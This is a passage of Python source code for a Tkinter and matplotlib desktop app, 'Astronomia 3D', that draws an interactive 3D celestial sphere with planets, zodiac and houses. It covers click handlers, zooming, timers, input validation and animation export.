v[2]<0:\r\n lon=norm_(360-lon)\r\n if self.v_MC[1]>0 and v[2]>0:\r\n lon=norm_(360-lon)\r\n\r\n self.show_txt_tip(lon,\"Ecliptic\")\r\n\r\n\r\n if event.mouseevent.button==3:\r\n for id_t in self.planets_obj.keys(): # click circles to hide\r\n obj = self.planets_obj[id_t]\r\n for key_ in [\"id_Mer\", \"id_Par\", \"id_proj_hor\", \"id_Mer_nat\", \"id_proj_hor_nat\"]:\r\n id_=obj[key_]\r\n if event.artist==id_:\r\n id_.set_visible(False)\r\n return\r\n\r\n\r\n for id_t in self.planets_obj.keys(): # click planet text\r\n obj = self.planets_obj[id_t]\r\n if event.artist==id_t:\r\n if event.mouseevent.button==3:\r\n pass\r\n '''\r\n isVisible = obj[\"id_Mer_nat\"].get_visible()\r\n obj[\"id_Mer_nat\"].set_visible(not isVisible)\r\n obj[\"id_proj_hor_nat\"].set_visible(not isVisible)\r\n '''\r\n else:\r\n pass\r\n \r\n φ_hor = obj[\"id_pt_Hor\"][1]\r\n azimuth = obj[\"id_pt_Hor\"][3]\r\n altitude = obj[\"id_pt_Hor\"][4]\r\n txt=\" {}, azim={:.1f}°(E), {:.1f}°(N), alt={:.1f}°\".format(obj[\"txt\"], φ_hor, azimuth, altitude)\r\n txt=txt.replace(\"Node_\",\"Node \")\r\n self.id_text_2.set_text(txt)\r\n self.timer_azim_elev(15000) \r\n self.canvas.draw_idle()\r\n return\r\n\r\n for id_t in self.planets_obj.keys(): # click planet dot\r\n obj = self.planets_obj[id_t]\r\n id_pl = obj[\"id_pl\"]\r\n if event.artist==id_pl:\r\n if id_pl.get_visible()==False:return\r\n if event.mouseevent.button==1:\r\n if self.planets_obj[id_t][\"show_mer_par\"]==0:\r\n obj[\"id_Mer\"].set_visible(True)\r\n obj[\"id_Par\"].set_visible(True)\r\n #obj[\"id_proj_hor\"].set_visible(True) #planet's proportionate horizon\r\n self.planets_obj[id_t][\"show_mer_par\"]=1\r\n elif self.planets_obj[id_t][\"show_mer_par\"]==1:\r\n obj[\"id_Mer\"].set_visible(True)\r\n obj[\"id_Par\"].set_visible(False)\r\n #obj[\"id_proj_hor\"].set_visible(False)\r\n self.planets_obj[id_t][\"show_mer_par\"]=2\r\n elif self.planets_obj[id_t][\"show_mer_par\"]==2:\r\n obj[\"id_Mer\"].set_visible(False)\r\n obj[\"id_Par\"].set_visible(True)\r\n #obj[\"id_proj_hor\"].set_visible(False)\r\n self.planets_obj[id_t][\"show_mer_par\"]=3\r\n elif self.planets_obj[id_t][\"show_mer_par\"]==3:\r\n obj[\"id_Mer\"].set_visible(False)\r\n obj[\"id_Par\"].set_visible(False)\r\n #obj[\"id_proj_hor\"].set_visible(False)\r\n self.planets_obj[id_t][\"show_mer_par\"]=0\r\n\r\n elif event.mouseevent.button==3:\r\n for el in [\"id_pt_Eq\", \"id_pt_Hor\", \"id_pt_Ecl\"]:\r\n isVisible = obj[el][0].get_visible()\r\n obj[el][0].set_visible(not isVisible)\r\n for el in [\"id_l_eq\", \"id_l_ecl\", \"id_l_ho\"]:\r\n isVisible = obj[el].get_visible()\r\n obj[el].set_visible(not isVisible)\r\n\r\n φ_hor = obj[\"id_pt_Hor\"][1]\r\n azimuth = obj[\"id_pt_Hor\"][3]\r\n altitude = obj[\"id_pt_Hor\"][4]\r\n txt=\" {}, azim={:.1f}°(E), {:.1f}°(N), alt={:.1f}°\".format(obj[\"txt\"], φ_hor, azimuth, altitude)\r\n txt=txt.replace(\"Node_\",\"Node \")\r\n self.id_text_2.set_text(txt)\r\n self.timer_azim_elev(15000) \r\n return\r\n\r\n for id_t in self.planets_obj.keys(): # click projection dot\r\n obj = self.planets_obj[id_t]\r\n id_pl = obj[\"id_pl\"]\r\n id_dot_Eq = obj[\"id_pt_Eq\"][0]\r\n id_dot_Ec = obj[\"id_pt_Ecl\"][0]\r\n id_dot_H = obj[\"id_pt_Hor\"][0]\r\n name = obj[\"name\"]\r\n\r\n if event.artist in [id_dot_Eq, id_dot_Ec ,id_dot_H]:\r\n if event.mouseevent.button == 3:\r\n self.clear_ann(event)\r\n else:\r\n if event.artist ==id_dot_Eq:\r\n if id_dot_Eq.get_visible()==False:return\r\n txt=\" {} RA={:.0f}°\".format(name, obj[\"id_pt_Eq\"][1])\r\n xyz=obj[\"id_pt_Eq\"][2]\r\n elif event.artist ==id_dot_H:\r\n if id_dot_H.get_visible()==False:return\r\n txt=\" {} azim={:.0f}°(from E) \".format(name,obj[\"id_pt_Hor\"][1])# φ hor.\r\n xyz=obj[\"id_pt_Hor\"][2] \r\n elif event.artist ==id_dot_Ec:\r\n if id_dot_Ec.get_visible()==False:return \r\n txt=\" {} ecl. long={:.0f}° \".format(name, obj[\"id_pt_Ecl\"][1])\r\n xyz=obj[\"id_pt_Ecl\"][2] \r\n self.show_annot(xyz,txt, interval_=2000)\r\n self.canvas.draw_idle()\r\n return\r\n\r\n for id_ in self.houses_obj.keys():\r\n if event.artist==id_:\r\n obj = self.houses_obj[id_]\r\n txt=\" {}, {} \".format(obj[0], obj[1])\r\n self.show_annot(obj[2],txt)\r\n\r\n if event.mouseevent.button == 3:\r\n self.clear_ann(event)\r\n else:\r\n self.canvas.draw_idle()\r\n return\r\n\r\n for id_ in self.zodiac_obj.keys(): \r\n if event.artist==id_:\r\n obj = self.zodiac_obj[id_]\r\n txt=\" {}, {} \".format(obj[0], obj[1])\r\n self.show_annot(obj[2],txt)\r\n x2, y2, _ = proj3d.proj_transform(*obj[2], self.ax.get_proj())\r\n if event.mouseevent.button == 3:\r\n self.clear_ann(event)\r\n else:\r\n self.canvas.draw_idle()\r\n return\r\n\r\n\r\n if id(event.artist) in self.ids.keys():\r\n xyz=self.ids[id(event.artist)][0]\r\n txt=self.ids[id(event.artist)][1]\r\n for i in range(len(self.click_tip_list)):\r\n if self.click_tip_list[i] in txt:\r\n s=True\r\n x2, y2, _ = proj3d.proj_transform(xyz[0],xyz[1],xyz[2], self.ax.get_proj())\r\n self.annot.xy = x2, y2\r\n self.annot.set_text(txt)\r\n self.annot.set_visible(True)\r\n\r\n try:self.timer.stop()\r\n except:pass\r\n self.timer = self.canvas.new_timer(interval=5000)\r\n self.timer.add_callback(self.clear_ann)\r\n self.timer.start()\r\n self.canvas.draw_idle()\r\n\r\n def on_click(self,event):\r\n if event.button==3:\r\n self.clear_ann()\r\n\r\n def show_txt_tip(self,dig,which=\"\"):\r\n if which==\"Ecliptic\":\r\n txt = \" Click on Ecliptic: lon={:.0f}° \".format(dig)\r\n elif which==\"Equator\":\r\n txt = \" Click on Equator: RA={:.0f}° \".format(dig)\r\n else:\r\n txt = \" {} \".format(dig)\r\n self.id_text_3.set_text(txt)\r\n self.canvas.draw_idle()\r\n try:self.timer3.stop()\r\n except:pass\r\n self.timer3 = self.canvas.new_timer(interval=15000)\r\n self.timer3.add_callback(self.hide_txt_tip)\r\n self.timer3.start()\r\n\r\n def hide_txt_tip(self):\r\n self.id_text_3.set_text(\"\")\r\n self.canvas.draw_idle()\r\n try:self.timer3.stop()\r\n except:pass\r\n\r\n def zoom_(self, event, r):\r\n l_x1, l_x2 = self.ax.get_xlim()\r\n l_y1, l_y2 = self.ax.get_ylim()\r\n xdata = event.xdata\r\n ydata = event.ydata\r\n width = l_x2 - l_x1\r\n height = l_y2 - l_y1\r\n w = r*width ; h = r*height\r\n dx1 = xdata - (xdata - l_x1) * r\r\n dx2 = xdata + (l_x2 - xdata) * r\r\n dy1 = ydata - (ydata - l_y1) * r\r\n dy2 = ydata + (l_y2 - ydata) * r\r\n self.ax.set_xlim(dx1, dx2)\r\n self.ax.set_ylim(dy1, dy2)\r\n self.ax.figure.canvas.draw()\r\n\r\n def scroll_zoom(self, event):\r\n r=0.20\r\n r=1-r\r\n if event.button == \"up\":\r\n self.zoom_(event,r) \r\n elif event.button == \"down\":\r\n self.zoom_(event,1/r)\r\n\r\n\r\n def extra_off(self):\r\n for id_t in self.planets_obj:\r\n obj = self.planets_obj[id_t] \r\n for el in [\"id_Mer\", \"id_Mer_nat\", \"id_Par\", \"id_proj_hor\", \"id_proj_hor_nat\"]:\r\n obj[el].set_visible(False)\r\n for el in [\"id_pt_Eq\", \"id_pt_Hor\", \"id_pt_Ecl\"]:\r\n obj[el][0].set_visible(False)\r\n for el in [\"id_l_eq\", \"id_l_ecl\",\"id_l_ho\"]:\r\n obj[el].set_visible(False)\r\n self.annot.set_visible(False)\r\n #self.hide_h_line()\r\n\r\n #for el in [\"id_asc_Eq\", \"id_Mer\", \"id_l_eq\",\"id_Mer_nat\"]: \r\n # self.ASC_inf[el].set_visible(False)\r\n\r\n self.toggle_ecliptic_scale(hide= True) \r\n self.toggle_equator_scale(hide= True) \r\n self.toggle_horizon_scale(hide= True) \r\n self.toggle_prime_vert_scale(hide= True)\r\n\r\n def timer_azim_elev(self, interval=15000, event=None):\r\n try:self.timer_az.stop()\r\n except:pass\r\n self.timer_az = self.canvas.new_timer(interval=interval)\r\n self.timer_az.add_callback(self.clear_azim_elev)\r\n self.timer_az.start()\r\n\r\n def clear_azim_elev(self, event=None):\r\n try:self.timer_az.stop()\r\n except:pass\r\n self.id_text_2.set_text(\"\")\r\n self.canvas.draw_idle()\r\n print(\"clear azim_elev\") \r\n \r\n def clear_ann(self, event=None):\r\n self.annot.set_text(\"\")\r\n self.annot.set_visible(False)\r\n self.canvas.draw_idle()\r\n try:self.timer.stop()\r\n except:pass\r\n\r\n def save_animation(self, frames=40, minutes=0, hours=0, format=\"gif\"):\r\n def animate(frame_n):\r\n self.plot_next_prev(minutes=minutes, hours=hours)\r\n return \r\n\r\n resp = messagebox.askquestion(\"Sample animation\", f\"Save sample animation?\\nframes={frames}\\nminutes={minutes}, hours={hours}\") \r\n if resp != \"yes\":\r\n return\r\n anim = animation.FuncAnimation(self.fig, animate, frames=frames, interval=200, repeat=False, blit=False)\r\n video_ = animation.FFMpegWriter(fps=3)\r\n if format==\"gif\":\r\n filename=\"Astronomia3D_animation\"\r\n filename=asksaveasfilename(parent=self.parent,title=\"Save file\",initialdir=\"C:\\\\\",initialfile = filename,filetypes=[('image, .gif', '*.gif'),('All Files', '*.*')])\r\n if filename==\"\":return\r\n filename=f\"{filename}.gif\"\r\n elif format==\"mp4\":\r\n filename=\"Astronomia3D_animation\"\r\n filename=asksaveasfilename(parent=self.parent,title=\"Save file\",initialdir=\"C:\\\\\",initialfile = filename,filetypes=[('video, .mp4', '*.mp4'),('All Files', '*.*')])\r\n if filename==\"\":return\r\n filename=f\"{filename}.mp4\"; \r\n\r\n anim.save(filename, writer=video_)\r\n\r\n#=====================\r\n\r\nPAGE_BG1 = \"#134752\"\r\nBUTT_BG = \"#095161\"\r\nPAGE_BG_2=\"#0F5274\"\r\nFONT_BT2 = (\"Segoe UI\", 10, \"bold\")\r\nFONT_TIT = (\"Tahoma\", 10, \"bold\")\r\nCOLOR_TIT = \"#E1E1E1\"\r\nFONT_SYM = (\"Consolas\", 15, \"normal\")\r\nFONT_N = (\"Tahoma\", 10, \"bold\")\r\n\r\nclass GUI_astro3D:\r\n def __init__(self, parent, planets_data, geo_latitude, data, title_=\"Astronomia 3D - Popiel\"):\r\n self.parent = parent\r\n self.parent.title(title_) \r\n self.parent.bind(\"\", self.keypressed)\r\n self.parent.bind(\"\", self.keypressed)\r\n self.parent.bind(\"1\", self.keypressed)\r\n self.parent.bind(\"2\", self.keypressed)\r\n self.parent.bind(\"\", self.keypressed)\r\n self.parent.bind(\"\", self.keypressed)\r\n \r\n self.page_plot = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n self.page_plot.pack(side=\"top\",fill=\"both\",expand=True,anchor=\"sw\",ipadx=0, ipady=0) \r\n\r\n self.page0 = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n self.page0.pack(side=\"left\",fill=\"both\",expand=True,anchor=\"nw\",ipadx=0, ipady=0)\r\n self.page1 = Frame(self.page0,bg=PAGE_BG1,borderwidth=0, relief=\"ridge\")\r\n self.page1.pack(side=\"top\",fill=\"both\",expand=True,anchor=\"nw\",ipadx=0, ipady=0,pady=(0,0))\r\n self.page2 = Frame(self.page0,bg=PAGE_BG1,borderwidth=0, relief=\"ridge\") #\r\n self.page2.pack(side=\"bottom\",fill=\"both\",expand=True,anchor=\"nw\",ipadx=0, ipady=0)\r\n\r\n self.page3 = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n self.page3.pack(side=\"right\",fill=\"both\",expand=False,anchor=\"ne\",ipadx=0, ipady=0) \r\n self.page4 = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n self.page4.pack(side=\"right\",fill=\"both\",expand=False,anchor=\"ne\",ipadx=0, ipady=0) \r\n self.page5 = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n self.page5.pack(side=\"right\",fill=\"both\",expand=False,anchor=\"ne\",ipadx=0, ipady=0) \r\n\r\n self.chkvars=[]\r\n chkboxes={}\r\n for i, el in enumerate(c.planets):\r\n if el==\"Node_S\":continue\r\n chkvar = IntVar(); chkvar.set(1) \r\n self.chkvars.append(chkvar)\r\n name=el\r\n sym=c.planets[el]\r\n chkboxes[name]=chkvar\r\n font_f = \"Lucida Console\"\r\n font_ = (font_f, 13, \"normal\")\r\n padx_=1\r\n pady_=(2,0)\r\n if \"Node_\" in name:font_= (font_f, 11, \"normal\"); pady_=(3,0);\r\n if name==\"Sun\":padx_=0\r\n id_=Checkbutton(self.page1, text=sym, variable=self.chkvars[i], command = lambda name=name, chkvar=chkvar: self.planets_toggle(name,chkvar))\r\n id_.config(bg=PAGE_BG1, fg=\"#F0F0F0\", offvalue = 0, onvalue=1, font=font_, activebackground=PAGE_BG_2, activeforeground=\"#F0F0F0\", selectcolor=PAGE_BG_2, justify=\"center\", borderwidth=3)\r\n id_.grid(row=0, column=i+2,sticky='nw', padx=padx_, pady=pady_)\r\n\r\n lbl_empt = Label(self.page1, text=\" \", width=2, justify=\"center\", bg=PAGE_BG1, font=(\"Tahoma\", 8, \"bold\"))\r\n lbl_empt.grid(row=0, column=15,sticky=\"nw\", padx=0, pady=(2,0))\r\n\r\n self.chkvar_all = IntVar() ; self.chkvar_all.set(1)\r\n self.chk_all = Checkbutton(self.page1, text=\"All\", variable=self.chkvar_all, command = lambda name=\"All\", chkvar=self.chkvar_all: self.planets_toggle(name,chkvar))\r\n self.chk_all.config(offvalue = 0, onvalue=1, bg=PAGE_BG1, fg=\"#F0F0F0\", font=(\"Arial\", 8, \"bold\"), activebackground=PAGE_BG_2, activeforeground=\"#F0F0F0\", selectcolor=PAGE_BG_2,justify=\"center\",borderwidth=3)\r\n self.chk_all.grid(row=0, column=1,sticky='nw', padx=(4,4), pady=(3,0))\r\n\r\n sel_col= \"#015E70\" \r\n COL_1 = \"#E3E3E3\"\r\n style_ = ttk.Style()\r\n try:\r\n style_.theme_use(\"new_style\") \r\n except:\r\n style_ = ttk.Style()\r\n configure_ = dict(foreground = COL_1, selectbackground = sel_col,fieldbackground = sel_col,background = sel_col, arrowcolor = COL_1)\r\n style_.theme_create(\"new_style\", parent=\"alt\", settings = {\"TCombobox\":{\"configure\":configure_}} ) \r\n style_.theme_use(\"new_style\") \r\n\r\n self.combo_ = ttk.Combobox(self.page2, width = 24) \r\n self.combo_.grid(row=0, column=1,sticky=\"w\", padx=10, pady=(0,5)) \r\n self.combo_['values'] = (\"Extra off\", \"Planet projection points\", \"Planet meridian\", \"Planet parallel\", \r\n \"Planet prop. horizon\", \"All ecliptic points\", \"Zodiac ecliptic points\",\"Zodiac symbols\",\r\n \"Horizon projections off\",\r\n \"Ecliptic scale\", \"Equator scale\", \"Horizon scale\", \"Prime vertical scale\")\r\n self.combo_.set(\"Hide/show\")\r\n self.combo_[\"state\"] = \"readonly\"\r\n \r\n self.combo_.bind('<>',self.combobox_callback) \r\n self.combo_.bind('',self.combobox_callback)\r\n\r\n #SpinBox input range Validation\r\n self.vc = (self.parent.register(self.input_validate), \"%P\", \"%d\", \"%W\")\r\n\r\n self.time_shift_buttons()\r\n self.anim_buttons()\r\n self.geo_buttons()\r\n\r\n self.plot = astro3D(self.parent,self.page_plot, planets_data, geo_latitude, data=data) \r\n\r\n def time_shift_buttons(self): \r\n sel_col= \"#015E70\"\r\n COL=PAGE_BG1\r\n COL_F=\"#F6F6F6\"\r\n FONT_ = (\"Tahoma\", 8, \"bold\")\r\n FONT_2 = (\"Arial\", 9, \"bold\")\r\n COL_1 = \"#F6F6F6\"\r\n\r\n f_args_p={\"side\":\"top\",\"fill\":\"both\",\"expand\":False,\"anchor\":\"nw\"}\r\n\r\n self.fr = Frame(self.page3,bg=PAGE_BG1,borderwidth=0)\r\n\r\n self.f0 = Frame(self.fr,bg=PAGE_BG1,borderwidth=4)\r\n self.f0.pack(side=\"left\",fill=\"both\",expand=False,anchor=\"nw\", padx=0, pady=0) \r\n self.f1 = Frame(self.fr,bg=PAGE_BG1,borderwidth=4, padx=0, pady=0)\r\n self.f1.pack(**f_args_p)\r\n self.f2 = Frame(self.fr,bg=PAGE_BG1,borderwidth=4, padx=0, pady=0)\r\n self.f2.pack(**f_args_p)\r\n\r\n self.rad_var = StringVar(None, \"Days\")\r\n \r\n w=6; indic=0;\r\n ipx=4; ipy=1; py=0;\r\n args={\"width\":w,\"bg\":COL,\"fg\":COL_F,\"font\":FONT_,\"command\":None,\"variable\":self.rad_var,\"indicator\":indic, \"selectcolor\":sel_col}\r\n args_p={\"fill\":None, \"ipadx\":ipx, \"ipady\":ipy, \"pady\":py,\"side\":\"left\",\"anchor\":\"nw\"}\r\n self.rad_h=Radiobutton(self.f1, text = \"Hours\", value=\"Hours\", **args); self.rad_h.pack(**args_p) \r\n self.rad_m=Radiobutton(self.f1, text = \"Minutes\", value=\"Minutes\", **args); self.rad_m.pack(**args_p) \r\n self.rad_s=Radiobutton(self.f1, text = \"Seconds\", value=\"Seconds\", **args); self.rad_s.pack(**args_p)\r\n\r\n self.spbox_var = IntVar()\r\n self.sp = Spinbox(self.f2, from_=1, to=60,increment=1,textvariable=self.spbox_var,bg=sel_col,width=7,fg=COL_1,font=(\"Tahoma\", 11, \"normal\"),justify=\"center\",buttonbackground=COL)\r\n self.sp.pack(side=\"left\",anchor=\"nw\" ,padx=(0,7), pady=(2,0)) \r\n #SpinBox range Validation\r\n self.sp.config(validate =\"key\", validatecommand = self.vc )\r\n\r\n unit=\"Minutes\"\r\n self.spbox_var.set(10)\r\n self.rad_var.set(unit)\r\n\r\n F_arr=(\"Helvetica\", 14, \"bold\")\r\n ipx=4;ipy=0;py=(0,0);px=3;\r\n ipy=0\r\n arr_p={\"fill\":None, \"ipadx\":ipx, \"ipady\":ipy, \"padx\":px, \"pady\":py,\"side\":\"left\",\"anchor\":\"center\"} \r\n self.bt_arrowL = Button(self.f2,text=\"◄\",command=lambda e=None, Δt=None:self.prev_tk(e, Δt),width=4,bg=COL,fg=COL_F,font=FONT_2)\r\n self.bt_arrowR = Button(self.f2,text=\"►\",command=lambda e=None, Δt=None:self.next_tk(e, Δt),width=4,bg=COL,fg=COL_F,font=FONT_2)\r\n self.bt_arrowL.pack(**arr_p)\r\n self.bt_arrowR.pack(**arr_p)\r\n\r\n self.fr.grid(row=0, column=18,sticky=\"w\", padx=10, pady=(0,0),)\r\n self.bt_arrowL.bind(\"\", lambda e=None, Δt=1:self.prev_tk(e, r_click=Δt))\r\n self.bt_arrowR.bind(\"\", lambda e=None, Δt=1:self.next_tk(e, r_click=Δt)) \r\n\r\n self.rad_h.bind(\"\", lambda e=None, s=\"Hours\":self.radio_(e, s))\r\n self.rad_m.bind(\"\", lambda e=None, s=\"Minutes\":self.radio_(e, s))\r\n self.rad_s.bind(\"\", lambda e=None, s=\"Seconds\":self.radio_(e, s))\r\n\r\n def anim_buttons(self):\r\n sel_col= \"#015E70\"\r\n COL=PAGE_BG1\r\n COL_F=\"#F6F6F6\"\r\n FONT_ = (\"Tahoma\", 8, \"bold\")\r\n FONT_2 = (\"Arial\", 8, \"bold\")\r\n COL_1 = \"#F6F6F6\"\r\n\r\n self.bt_anim = Button(self.page4,text=\"Animation\",command=self.anim_tk,width=12,bg=COL,fg=COL_F,font=FONT_2)#\r\n self.bt_anim.grid(row=0, column=0, columnspan=2, sticky=\"w\", padx=(11, 8), pady=(3,5),ipady=0) \r\n self.spbox_var_st = IntVar()\r\n self.sp_st = Spinbox(self.page4, from_=1, to=30,increment=1,textvariable=self.spbox_var_st, bg=sel_col,width=4,fg=COL_1,font=(\"Tahoma\", 11, \"normal\"),justify=\"center\",buttonbackground=COL)\r\n self.sp_st.grid(row=1, column=0,sticky=\"w\", padx=(11, 0), pady=(6,5)) \r\n self.spbox_var_st.set(10)\r\n\r\n self.lbl2 = Label(self.page4, text=\"steps\", justify=\"center\", bg=PAGE_BG1, fg=\"#F0F0F0\", font=(\"Arial\",8, \"bold\"))\r\n self.lbl2.grid(row=1, column=1, sticky=\"w\", padx=(0,0), pady=4)\r\n\r\n #SpinBox range Validation\r\n self.sp_st.config(validate =\"key\", validatecommand = self.vc)\r\n self.bt_anim.bind(\"\", self.anim_back_tk)\r\n\r\n def geo_buttons(self):\r\n sel_col= \"#015E70\"\r\n COL=PAGE_BG1\r\n COL_F=\"#F6F6F6\"\r\n FONT_ = (\"Tahoma\", 8, \"bold\")\r\n FONT_2 = (\"Arial\", 8, \"bold\")\r\n COL_1 = \"#F6F6F6\"\r\n FONT_E = (\"Arial\", 10, \"normal\")\r\n\r\n self.bt_ = Button(self.page5,text=\"New for current time\",command=self.new_,width=21,bg=COL,fg=COL_F,font=FONT_2)#\r\n self.bt_.grid(row=0, column=0, columnspan=4, sticky=\"w\", padx=(10, 8), pady=(3,5),ipady=0) \r\n\r\n self.long_v = StringVar() ; self.lat_v = StringVar() \r\n self.lat_v.set(\"50.07\"); self.long_v.set(\"19.90\")\r\n #self.lat_v.set(\"40.67\") ; self.long_v.set(\"-73.95\")\r\n\r\n self.inp_lat = Entry(self.page5, textvar = self.lat_v, width=6, font = FONT_E, justify=\"center\", bg=sel_col, fg=COL_1, relief=\"sunken\")\r\n self.inp_lat.grid(row=1, column=0, columnspan=1, sticky=\"w\", padx=(10, 0), pady=(7,2),ipady=0) \r\n self.inp_long = Entry(self.page5, textvar = self.long_v, width=7,font = FONT_E, justify=\"center\", bg=sel_col, fg=COL_1, relief=\"sunken\")\r\n self.inp_long.grid(row=1, column=2, columnspan=1, sticky=\"w\", padx=(5, 0), pady=(7,2),ipady=0)\r\n\r\n lbl3 = Label(self.page5, text=\"lat\", justify=\"left\", width=1, bg=PAGE_BG1, fg=\"#F0F0F0\", font=(\"Arial\",8, \"bold\"))\r\n lbl3.grid(row=1, column=1, sticky=\"w\", padx=(2,0), pady=(7,2))\r\n lbl4 = Label(self.page5, text=\"lon\", justify=\"left\", width=2, bg=PAGE_BG1, fg=\"#F0F0F0\", font=(\"Arial\",8, \"bold\"))\r\n lbl4.grid(row=1, column=3, sticky=\"w\", padx=(0,6), pady=(7,2))\r\n\r\n self.inp_lat.config(validate =\"key\", validatecommand = self.vc)\r\n self.inp_long.config(validate =\"key\", validatecommand = self.vc)\r\n\r\n self.bt_.bind(\"\", self.reset_lat)\r\n\r\n\r\n\r\n def input_validate(self, input_, action, name):\r\n if input_:\r\n if input_==\"-\":\r\n return True\r\n elif input_==\".\" and \"entry\" in name:\r\n return True\r\n elif input_==\".\" and \"entry\" not in name:\r\n return False\r\n if \"entry2\" in name:\r\n try:\r\n input_=float(input_)\r\n if not self.test_float(input_, 2):\r\n return False\r\n return True\r\n except ValueError:\r\n return False\r\n elif \"entry\" in name:\r\n try:\r\n input_=float(input_)\r\n if not self.test_float(input_, 1):\r\n return False\r\n return True\r\n except ValueError:\r\n return False\r\n else: #Spinbox \r\n try:\r\n int(input_)\r\n if len(str(input_))>6:\r\n return False\r\n return True\r\n except ValueError:\r\n return False\r\n elif action==\"0\": #validatecommand + backspace\r\n return True\r\n else:\r\n return False\r\n\r\n def test_float(self, f, inp):\r\n s=str(f)\r\n s=s.replace(\"-\",\"\")\r\n if \".\" in s:\r\n arr=s.split(\".\")\r\n if len(arr)>2: \r\n return False #only 1 dot\r\n if len(arr[1])>2: \r\n return False # only 2 decimal digits\r\n\r\n lim = 2 if inp==1 else 3 \r\n if len(arr[0])>lim:\r\n return False\r\n else:\r\n lim2= 90 if inp==1 else 180 \r\n if abs(int(arr[0]))>lim2:\r\n return False\r\n return True \r\n else:\r\n lim = 2 if inp==1 else 3 \r\n if len(s)>lim:\r\n return False\r\n else:\r\n lim2= 90 if inp==1 else 180 \r\n if abs(int(arr[0]))>lim2:\r\n return False\r\n return True\r\n return True\r\n\r\n\r\n def input_validate0(self, input_, action):\r\n if input_:\r\n if input_==\"-\":\r\n return True\r\n\r\n try:\r\n int(input_)\r\n if len(input_)>4:\r\n return False\r\n return True\r\n except ValueError:\r\n return False\r\n elif action==\"0\": #validatecommand + backspace\r\n return True\r\n else:\r\n return False\r\n\r\n def radio_(self, event=None, s=None):\r\n val =self.rad_var.get()\r\n a1('',val , s)\r\n if s==\"Hours\":\r\n self.spbox_var.set(1)\r\n elif s==\"Minutes\":\r\n self.spbox_var.set(10)\r\n elif s==\"Seconds\":\r\n self.spbox_var.set(30)\r\n self.rad_var.set(s)\r\n\r\n def planets_toggle(self,name,id_):\r\n if name!=\"All\":\r\n obj=self.plot.planets_ids[name]\r\n if id_.get()==1:\r\n obj[\"id_pl\"].set_visible(True)\r\n obj[\"id_t\"].set_visible(True)\r\n if name==\"Node_N\":\r\n self.plot.planets_ids[\"Node_S\"][\"id_pl\"].set_visible(True)\r\n self.plot.planets_ids[\"Node_S\"][\"id_t\"].set_visible(True)\r\n elif id_.get()==0:\r\n for el_ in obj:\r\n obj[el_].set_visible(False)\r\n if name==\"Node_N\":\r\n for el_ in self.plot.planets_ids[\"Node_S\"]:\r\n self.plot.planets_ids[\"Node_S\"][el_].set_visible(False)\r\n self.chkvar_all.set(0)\r\n\r\n elif name==\"All\":\r\n if id_.get()==1:\r\n for id__ in self.chkvars:\r\n id__.set(1)\r\n for pl in self.plot.planets_ids:\r\n obj=self.plot.planets_ids[pl]\r\n obj[\"id_pl\"].set_visible(True)\r\n obj[\"id_t\"].set_visible(True)\r\n \r\n elif id_.get()==0:\r\n for id__ in self.chkvars:\r\n id__.set(0)\r\n for pl in self.plot.planets_ids:\r\n obj=self.plot.planets_ids[pl]\r\n for el_ in obj:\r\n obj[el_].set_visible(False)\r\n self.plot.canvas.draw_idle()\r\n\r\n def combobox_callback(self,event):\r\n str_ = self.combo_.get()\r\n if str_==\"Planet projection points\": \r\n for name in c.planets2:\r\n if name in [ \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=self.plot.planets_ids[name][\"id_pl\"].get_visible() \r\n if not isVisible:continue\r\n for el in [\"id_pt_Eq\", \"id_pt_Hor\", \"id_pt_Ecl\"]:\r\n obj[el].set_visible(isVisible)\r\n \r\n elif str_==\"Planet meridian\":\r\n for name in c.planets2:\r\n if name in [ \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue\r\n obj[\"id_Mer\"].set_visible(isVisible)\r\n\r\n elif str_==\"Planet parallel\":\r\n for name in c.planets2:\r\n if name in [\"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue\r\n obj[\"id_Par\"].set_visible(isVisible)\r\n\r\n elif str_==\"Planet prop. horizon\":\r\n for name in c.planets2:\r\n if name in [ \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue\r\n obj[\"id_proj_hor\"].set_visible(isVisible)\r\n\r\n elif str_==\"Planet meridian natal\":\r\n for name in c.planets2:\r\n if name in [\"Node_N\", \"Node_S\", \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue\r\n obj[\"id_Mer_nat\"].set_visible(isVisible)\r\n\r\n elif str_==\"Planet prop. horizon natal\":\r\n for name in c.planets2:\r\n if name in [\"Node_N\", \"Node_S\", \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue \r\n obj[\"id_proj_hor_nat\"].set_visible(isVisible)\r\n\r\n elif str_==\"Houses ecliptic points\": \r\n self.toggle_houses_p()\r\n\r\n elif str_==\"Zodiac ecliptic points\": \r\n self.toggle_ecl_p()\r\n\r\n elif str_==\"Zodiac symbols\":\r\n self.toggle_ecl_sym()\r\n\r\n elif str_==\"All ecliptic points\":\r\n self.toggle_ecl_p()\r\n self.toggle_ecl_sym()\r\n self.toggle_houses_p()\r\n\r\n elif str_==\"Celestial equator points\":\r\n isVisible=self.plot.armc_id.get_visible() \r\n self.plot.armc_id.set_visible(not isVisible)\r\n\r\n elif str_==\"Asc, MC, ARMC...\":\r\n isVisible=self.plot.asc_id.get_visible()\r\n for id_ in [self.plot.armc_id, self.plot.mc_id, self.plot.asc_id, self.plot.asc_id2, self.plot.poleN_id, self.plot.poleS_id]:\r\n id_.set_visible(not isVisible)\r\n\r\n elif str_==\"Horizon projections off\":\r\n for name in self.plot.planets_ids:\r\n if name in [\"Node_N\", \"Node_S\", \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n for el in [\"id_l_ho\", \"id_pt_Hor\"]:\r\n 